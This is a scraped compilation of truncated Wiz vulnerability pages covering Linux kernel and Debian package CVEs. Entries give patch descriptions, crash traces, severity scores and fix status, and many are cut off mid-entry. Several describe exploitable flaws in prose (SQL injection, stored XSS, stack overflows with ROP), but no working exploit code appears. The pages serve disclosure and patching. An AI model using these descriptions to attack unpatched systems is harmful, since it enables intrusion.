Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nfc: virtual_ncidev: Fix memory leak in virtual_nci_send()
skb should be free in virtual_nci_send(), otherwise kmemleak will report
memleak.
Steps for reproduction (simulated in qemu):
cd tools/testing/selftests/nci
make
./nci_dev
BUG: memory leak
unreferenced object 0xffff888107588000 (size 208):
comm "nci_dev", pid 206, jiffies 4294945376 (age 368.248s)
hex dump (first 32 bytes):
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace:
[] __alloc_skb+0x1da/0x290
[] nci_send_cmd+0xa3/0x350
[] nci_reset_req+0x6b/0xa0
[] __nci_request+0x90/0x250
[] nci_dev_up+0x217/
Wiz
CVE-2026-23435 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23435 CVE-2026-23435 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23435 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
perf/x86: Move event pointer setup earlier in x86_pmu_enable()
A production AMD EPYC system crashed with a NULL pointer dereference
in the PMU NMI handler:
BUG: kernel NULL pointer dereference, address: 0000000000000198
RIP: x86_perf_event_update+0xc/0xa0
Call Trace: amd_pmu_v2_handle_irq+0x1a6/0x390
perf_event_nmi_handler+0x24/0x40
cmpq $0x0, 0x198(%rdi)
if (unlikely(!hwc->event_base))
drgn inspection of the vmcore on CPU 106 showed a mismatch between
cpuc->active_mask and cpuc->events[]:
active_mask: 0x1e (bits 1, 2, 3, 4)
events[1]: 0xff1100136cbd4f38 (valid)
events[2]: 0x0 (NULL, but active_mask bit 2 set)
events[3]: 0xff1100076fd2cf38 (val
Wiz
CVE-2022-50877 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50877 [MEDIUM] CVE-2022-50877 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50877 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: broadcom: bcm4908_enet: update TX stats after actual transmission
Queueing packets doesn't guarantee their transmission. Update TX stats
after hardware confirms consuming submitted data.
This also fixes a possible race and NULL dereference.
bcm4908_enet_start_xmit() could try to access skb after freeing it in
the bcm4908_enet_poll_tx().
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages a
Wiz
CVE-2026-33058 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2026-33058 [HIGH] CVE-2026-33058 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33058 :
Linux Debian vulnerability analysis and mitigation
Kanboard is project management software focused on Kanban methodology. Versions prior to 1.2.51 have an authenticated SQL injection vulnerability. Attackers with the permission to add users to a project can leverage this vulnerability to dump the entirety of the kanboard database. Version 1.2.51 fixes the issue.
Source : NVD
## 8.4
Score
Published March 18, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
kanboard
Sources
NVD
Debian 14 Severity MEDIUM Has Fix Added at: Mar
Wiz
CVE-2026-23194 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23194 [HIGH] CVE-2026-23194 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23194 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rust_binder: correctly handle FDA objects of length zero
skip == 0
skip == 0
I considered the alternate option of not pushing a fixup when the length
is zero, but I think it's cleaner to just get rid of the zero-is-special
stuff.
The root cause of this bug was diagnosed by Gemini CLI on first try. I
used the following prompt:
There appears to be a bug in @drivers/android/binder/thread.rs where
the Fixups oob bug is triggered with 316 304 316 324. This implies
that we somehow ended up with a fixup where buffer A has a pointer to
buffer B, but the pointer is located at an index in buffer A that is
out of bounds. Please investigate the code to find
Wiz
CVE-2026-23464 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23464 [MEDIUM] CVE-2026-23464 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23464 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
soc: microchip: mpfs: Fix memory leak in mpfs_sys_controller_probe()
In mpfs_sys_controller_probe(), if of_get_mtd_device_by_node() fails,
the function returns immediately without freeing the allocated memory
for sys_controller, leading to a memory leak.
Fix this by jumping to the out_free label to ensure the memory is
properly freed.
Also, consolidate the error handling for the mbox_request_channel()
failure case to use the same label.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitati
Wiz
CVE-2024-29370 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2024-29370 [MEDIUM] CVE-2024-29370 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2024-29370 :
Linux Debian vulnerability analysis and mitigation
In python-jose 3.3.0 (specifically jwe.decrypt), a vulnerability allows an attacker to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression.
Source : NVD
## 5.3
Score
Published December 17, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 36.3
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
python-jose
Wiz
CVE-2026-4645 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-4645 [HIGH] CVE-2026-4645 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4645 :
Linux Debian vulnerability analysis and mitigation
Rejected reason: Duplicate of CVE-2026-32287
Source : NVD
## 7.5
Score
Published March 23, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
golang-github-antchfx-xpath
opentelemetry-collector
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Mar 24, 2026
Debian 12, 13 Severity HIGH No Fix Added at: Mar 24, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 24, 2026
Echo Severity HIGH No Fix Added at: Mar 24, 2026
Red Hat 9, 10 Severity HIGH No Fix Ad
Wiz
CVE-2023-54103 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54103 [MEDIUM] CVE-2023-54103 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54103 :
Linux Debian vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at: Dec 26, 2025
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Dec 26, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on
Wiz
CVE-2023-54124 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2023-54124 CVE-2023-54124 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54124 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to drop all dirty pages during umount() if cp_error is set
xfstest generic/361 reports a bug as below:
f2fs_bug_on(sbi, sbi->fsync_node_num);
kernel BUG at fs/f2fs/super.c:1627!
RIP: 0010:f2fs_put_super+0x3a8/0x3b0
Call Trace:
generic_shutdown_super+0x8c/0x1b0
kill_block_super+0x2b/0x60
kill_f2fs_super+0x87/0x110
deactivate_locked_super+0x39/0x80
deactivate_super+0x46/0x50
cleanup_mnt+0x109/0x170
__cleanup_mnt+0x16/0x20
task_work_run+0x65/0xa0
exit_to_user_mode_prepare+0x175/0x190
syscall_exit_to_user_mode+0x25/0x50
do_syscall_64+0x4c/0x90
entry_SYSCALL_64_after_hwframe+0x72/0xdc
During umount(), if cp_error is set, f2fs_wait_on_all_pag
Wiz
CVE-2026-23409 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23409 CVE-2026-23409 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23409 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix differential encoding verification
Differential encoding allows loops to be created if it is abused. To
prevent this the unpack should verify that a diff-encode chain
terminates.
Unfortunately the differential encode verification had two bugs.
it conflated states that had gone through check and already been
marked, with states that were currently being checked and marked.
This means that loops in the current chain being verified are treated
as a chain that has already been verified.
the order bailout on already checked states compared current chain
check iterators j,k instead of using the outer loop iterator i.
Meaning a step backwa
Wiz
CVE-2026-2704 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-2704 [MEDIUM] CVE-2026-2704 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2704 :
Linux Debian vulnerability analysis and mitigation
A security vulnerability has been detected in Open Babel up to 3.1.1. The affected element is the function OpenBabel::transform3d::DescribeAsString of the file src/math/transform3d.cpp of the component CIF File Handler. The manipulation leads to out-of-bounds read. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The identifier of the patch is e23a224b8fd9d7c2a7cde9ef4ec6afb4c05aa08a. It is suggested to install a patch to address this issue. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 5.3
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Wiz
CVE-2025-14932 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-14932 [HIGH] CVE-2025-14932 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14932 :
Linux Debian vulnerability analysis and mitigation
NSF Unidata NetCDF-C Time Unit Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the parsing of time units. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27273.
Source : NVD
## 7.8
Score
Published December 23, 20
Wiz
CVE-2023-54180 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2023-54180 CVE-2023-54180 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54180 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
btrfs: handle case when repair happens with dev-replace
[BUG]
There is a bug report that a BUG_ON() in btrfs_repair_io_failure()
(originally repair_io_failure() in v6.0 kernel) got triggered when
replacing a unreliable disk:
BTRFS warning (device sda1): csum failed root 257 ino 2397453 off 39624704 csum 0xb0d18c75 expected csum 0x4dae9c5e mirror 3
kernel BUG at fs/btrfs/extent_io.c:2380!
invalid opcode: 0000 [#1] PREEMPT SMP NOPTI
CPU: 9 PID: 3614331 Comm: kworker/u257:2 Tainted: G OE 6.0.0-5-amd64 #1 Debian 6.0.10-2
Hardware name: Micro-Star International Co., Ltd. MS-7C60/TRX40 PRO WIFI (MS-7C60), BIOS 2.70 07/01/2021
Workqueue: btrfs-endio btrfs
Wiz
CVE-2023-54187 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54187 [MEDIUM] CVE-2023-54187 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54187 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix potential corruption when moving a directory
F2FS has the same issue in ext4_rename causing crash revealed by
xfstests/generic/707.
See also commit 0813299c586b ("ext4: Fix possible corruption when moving a directory")
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-riscv-6.8
linux-aws-5.4
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 31, 2025
Wiz
CVE-2025-68920 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2025-68920 [HIGH] CVE-2025-68920 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68920 :
Linux Debian vulnerability analysis and mitigation
C-Kermit (aka ckermit) through 10.0 Beta.12 (aka 416-beta12) before 244644d allows a remote Kermit system to overwrite files on the local system, or retrieve arbitrary files from the local system.
Source : NVD
## 8.9
Score
Published December 24, 2025
Severity HIGH
CNA Score 8.9
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
ckermit
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 26, 2025
Debian 14 Severity HIGH Has Fix Added at: Dec 26, 2025
Echo Severity HIGH No Fix Added at:
Wiz
CVE-2025-71124 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-71124 [MEDIUM] CVE-2025-71124 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71124 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/msm/a6xx: move preempt_prepare_postamble after error check
Move the call to preempt_prepare_postamble() after verifying that
preempt_postamble_ptr is valid. If preempt_postamble_ptr is NULL,
dereferencing it in preempt_prepare_postamble() would lead to a crash.
This change avoids calling the preparation function when the
postamble allocation has failed, preventing potential NULL pointer
dereference and ensuring proper error handling.
Patchwork: https://patchwork.freedesktop.org/patch/687659/
Source : NVD
## 5.5
Score
Published January 14, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public
Wiz
CVE-2026-0966 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-0966 [MEDIUM] CVE-2026-0966 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0966 :
Linux Debian vulnerability analysis and mitigation
ssh_get_hexa()
ssh_get_fingerprint_hash()
ssh_print_hexa()
The function is also used internally in the gssapi code for logging
the OIDs received by the server during GSSAPI authentication. This
could be triggered remotely, when the server allows GSSAPI authentication
and logging verbosity is set at least to SSH_LOG_PACKET (3). This
could cause self-DoS of the per-connection daemon process.
Source : NVD
## 6.5
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.2
Exploitation Probability (EPSS) 0.1
Affecte
Wiz
CVE-2025-68175 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-68175 CVE-2025-68175 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68175 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: nxp: imx8-isi: Fix streaming cleanup on release
The current implementation unconditionally calls
mxc_isi_video_cleanup_streaming() in mxc_isi_video_release(). This can
lead to situations where any release call (like from a simple
"v4l2-ctl -l") may release a currently streaming queue when called on
such a device.
This is reproducible on an i.MX8MP board by streaming from an ISI
capture device using gstreamer:
gst-launch-1.0 -v v4l2src device=/dev/videoX ! \
video/x-raw,format=GRAY8,width=1280,height=800,framerate=1/120 ! \
fakesink
While this stream is running, querying the caps of the same device
provokes the error state:
v4l2-ctl -l -d
Wiz
CVE-2026-27473 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-27473 [MEDIUM] CVE-2026-27473 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27473 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.4.9 allows Stored Cross-Site Scripting (XSS) via syndicated sites in the private area. The #URL_SYNDIC output is not properly sanitized on the private syndicated site page, allowing an attacker who can set a malicious syndication URL to inject persistent scripts that execute when other administrators view the syndicated site details.
Source : NVD
## 5.1
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
spip
Sources
NVD
Debi
Wiz
CVE-2025-68760 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68760 [MEDIUM] CVE-2025-68760 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68760 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Fix potential out-of-bounds read in iommu_mmio_show
iommu->dbg_mmio_offset > iommu->mmio_phys_end - 4
mmio_phys_end - 4
Fix this by adjusting the boundary check to use sizeof(u64), which
corresponds to the size of the readq() operation.
Source : NVD
Published January 5, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws
linux-aws-6.17
Sources
NVD
Debian 14 Has Fix Added at: Jan 05, 2026
Wiz
CVE-2026-23015 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-23015 [MEDIUM] CVE-2026-23015 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23015 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
gpio: mpsse: fix reference leak in gpio_mpsse_probe() error paths
The reference obtained by calling usb_get_dev() is not released in the
gpio_mpsse_probe() error paths. Fix that by using device managed helper
functions. Also remove the usb_put_dev() call in the disconnect function
since now it will be released automatically.
Source : NVD
## 5.5
Score
Published January 31, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affe
Wiz
CVE-2025-61982 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-61982 [HIGH] CVE-2025-61982 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61982 :
Linux Debian vulnerability analysis and mitigation
An arbitrary code execution vulnerability exists in the Code Stream directive functionality of OpenCFD OpenFOAM 2506. A specially crafted OpenFOAM simulation file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
## 7.8
Score
Published February 18, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openfoam
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Feb 19, 2026
Echo Severity
Wiz
CVE-2023-54257 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2023-54257 CVE-2023-54257 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54257 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: macb: fix a memory corruption in extended buffer descriptor mode
For quite some time we were chasing a bug which looked like a sudden
permanent failure of networking and mmc on some of our devices.
The bug was very sensitive to any software changes and even more to
any kernel debug options.
Finally we got a setup where the problem was reproducible with
CONFIG_DMA_API_DEBUG=y and it revealed the issue with the rx dma:
[ 16.992082] ------------[ cut here ]------------
[ 16.996779] DMA-API: macb ff0b0000.ethernet: device driver tries to free DMA memory it has not allocated [device address=0x0000000875e3e244] [size=1536 bytes]
[ 17.011049] WARNIN
Wiz
CVE-2018-25224 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2018-25224 [HIGH] CVE-2018-25224 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2018-25224 :
Linux Debian vulnerability analysis and mitigation
PMS 0.42 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to execute arbitrary code by supplying malicious values in the configuration file. Attackers can craft configuration files with oversized input that overflows the stack buffer and execute shell commands via return-oriented programming gadgets.
Source : NVD
## 8.6
Score
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pms
Sources
NVD
Debian 11, 1
Wiz
CVE-2026-4424 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4424 [MEDIUM] CVE-2026-4424 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4424 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.
Source : NVD
## 7.5
Score
Published March 19, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 38.7
Exploitation Probabi
Wiz
CVE-2025-68786 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68786 [MEDIUM] CVE-2025-68786 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68786 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: skip lock-range check on equal size to avoid size==0 underflow
size - 1
Source : NVD
Published January 13, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-oracle-6.14
linux-fips
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Jan 14, 2026
Echo Has Fix Added at: Jan 14, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Jan 15, 2026
Ubuntu 22.04, 24.04, 25.10 Severity MEDIUM
Wiz
CVE-2026-4185 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4185 [MEDIUM] CVE-2026-4185 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4185 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was found in GPAC up to 2.5-DEV-rev2167-gcc9d617c0-master. This vulnerability affects the function swf_def_bits_jpeg of the file src/scene_manager/swf_parse.c of the component MP4Box. The manipulation of the argument szName results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. The patch is identified as 8961c74f87ae3fe2d3352e622f7730ca96d50cf1. A patch should be applied to remediate this issue.
Source : NVD
## 5.3
Score
Published March 16, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Expl
Wiz
CVE-2022-50874 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50874 [MEDIUM] CVE-2022-50874 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50874 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
RDMA/erdma: Fix refcount leak in erdma_mmap
rdma_user_mmap_entry_get() take reference, we should release it when not
need anymore, add the missing rdma_user_mmap_entry_put() in the error
path to fix it.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-fips
linux-gcp-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 31, 2025
Echo Has Fix Added at: Dec 31, 2025
Wiz
CVE-2026-23358 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23358 [MEDIUM] CVE-2026-23358 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23358 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: Fix error handling in slot reset
If the device has not recovered after slot reset is called, it goes to
out label for error handling. There it could make decision based on
uninitialized hive pointer and could result in accessing an uninitialized
list.
Initialize the list and hive properly so that it handles the error
situation and also releases the reset domain lock which is acquired
during error_detected callback.
(cherry picked from commit bb71362182e59caa227e4192da5a612b09349696)
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
CVE-2026-23411 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23411 [HIGH] CVE-2026-23411 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23411 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix race between freeing data and fs accessing it
AppArmor was putting the reference to i_private data on its end after
removing the original entry from the file system. However the inode
can aand does live beyond that point and it is possible that some of
the fs call back functions will be invoked after the reference has
been put, which results in a race between freeing the data and
accessing it through the fs.
While the rawdata/loaddata is the most likely candidate to fail the
race, as it has the fewest references. If properly crafted it might be
possible to trigger a race for the other types stored in i_private.
Fix this by moving the
Wiz
CVE-2023-54061 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54061 [MEDIUM] CVE-2023-54061 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54061 :
Linux Debian vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
## 5.5
Score
Published December 24, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-fips
linux-fips
Sources
NVD
Debian 12 No Fix Added at: Dec 26, 2025
Debian 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at: Dec 26, 2025
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Dec 26, 2025
## Get a CVE risk assessment
G
Wiz
CVE-2026-23468 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-23468 [MEDIUM] CVE-2026-23468 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23468 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: Limit BO list entry count to prevent resource exhaustion
Userspace can pass an arbitrary number of BO list entries via the
bo_number field. Although the previous multiplication overflow check
prevents out-of-bounds allocation, a large number of entries could still
cause excessive memory allocation (up to potentially gigabytes) and
unnecessarily long list processing times.
Introduce a hard limit of 128k entries per BO list, which is more than
sufficient for any realistic use case (e.g., a single list containing all
buffers in a large scene). This prevents memory exhaustion attacks and
ensures predictable performance.
Return -EINVAL if t
Wiz
CVE-2022-50812 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50812 [MEDIUM] CVE-2022-50812 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50812 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
